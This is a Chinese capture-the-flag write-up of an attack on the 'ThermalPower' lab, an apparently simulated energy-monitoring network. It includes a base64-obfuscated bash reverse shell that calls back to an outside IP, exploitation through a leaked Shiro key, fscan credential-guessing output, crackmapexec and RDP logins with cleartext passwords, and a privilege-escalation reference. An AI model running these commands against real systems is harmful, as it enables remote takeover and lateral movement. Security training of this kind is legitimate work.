ThermalPower-春秋云镜

Oceanzbz

2024-12-30

攻防渗透

域渗透, 春秋云镜, 渗透测试

信息收集

目录扫描

扫出来一个headump，用内存工具分析一下

找到shiro key直接利用一波

漏洞利用

1
2
3


bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDEuNjMuMTIwLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}'

之后反弹shell拿到shell看下网卡信息

内网信息收集

然后下载fscan直接扫描一波


./fscan -h 172.22.17.213/24

  

___ _

/ _ \ ___ ___ _ __ __ _ ___| | __

/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /

/ /_\\_____\__ \ (__| | | (_| | (__| <

\____/ |___/\___|_| \__,_|\___|_|\_\

fscan version: 1.8.4

start infoscan

(icmp) Target 172.22.17.6 is alive

(icmp) Target 172.22.17.213 is alive

[*] Icmp alive hosts len is: 2

172.22.17.6:135 open

172.22.17.6:80 open

172.22.17.213:22 open

172.22.17.6:21 open

172.22.17.213:8080 open

172.22.17.6:445 open

172.22.17.6:139 open

[*] alive ports len is: 7

start vulscan

[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER

[*] NetInfo

[*]172.22.17.6

[->]WIN-ENGINEER

[->]172.22.17.6

[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=8C8C2698165BC498428345B7768228CA

[*] WebTitle http://172.22.17.213:8080/login;jsessionid=8C8C2698165BC498428345B7768228CA code:200 len:2936 title:火创能源监控画面管理平台

[+] ftp 172.22.17.6:21:anonymous

[->]Modbus

[->]PLC

[->]web.config

[->]WinCC

[->]内部软件

[->]火创能源内部资料

[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /

[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file

[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2

已完成 6/7 [-] ssh 172.22.17.213:22 root root_123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

已完成 6/7 [-] ssh 172.22.17.213:22 root 000000 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

已完成 6/7 [-] ssh 172.22.17.213:22 root 2wsx@WSX ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

已完成 6/7 [-] ssh 172.22.17.213:22 admin Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

  

已完成 6/7 [-] ssh 172.22.17.213:22 admin 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

已完成 6/7 [-] ssh 172.22.17.213:22 admin 1qaz!QAZ ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain

已完成 7/7

[*] 扫描结束,耗时: 6m36.928867719s

这里有netbios开放想到可能会有rdp

搭建代理

搭建代理访问里面的信息，这里使用frp进行访问吧

可以成功访问到内网的网页看一下这些敏感信息

使用chenhua chenhua@0813 可以登录成功爆破一下就可以了使用cme

1
2
3


crackmapexec smb 172.22.17.6 -u chenhua -p chenhua@0813

kali rdp命令

1
2
3


proxychains -q xfreerdp /u:chenhua /p:chenhua@0813 /v:172.22.17.6:3389 +clipboard /drive:tmp,/tmp

我这里用的是parallesclient

可以看到用户都是属于backupOperators组里的并且这个机器不出网所以只能提权，参考：

https://github.com/k4sth4/SeBackupPrivilege

拿到flag

继续用fscan扫描一下


./fscan -h 172.22.26.1/24

  

___ _

/ _ \ ___ ___ _ __ __ _ ___| | __

/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /

/ /_\\_____\__ \ (__| | | (_| | (__| <

\____/ |___/\___|_| \__,_|\___|_|\_\

fscan version: 1.8.4

start infoscan

(icmp) Target 172.22.26.11 is alive

[*] Icmp alive hosts len is: 1

172.22.26.11:445 open

172.22.26.11:139 open

172.22.26.11:80 open

172.22.26.11:135 open

172.22.26.11:1433 open

[*] alive ports len is: 5

start vulscan

[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA

[+] mssql 172.22.26.11:1433:sa 123456

[*] NetInfo

[*]172.22.26.11

[->]WIN-SCADA

[->]172.22.26.11

[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server

已完成 5/5

[*] 扫描结束,耗时: 4.784177011s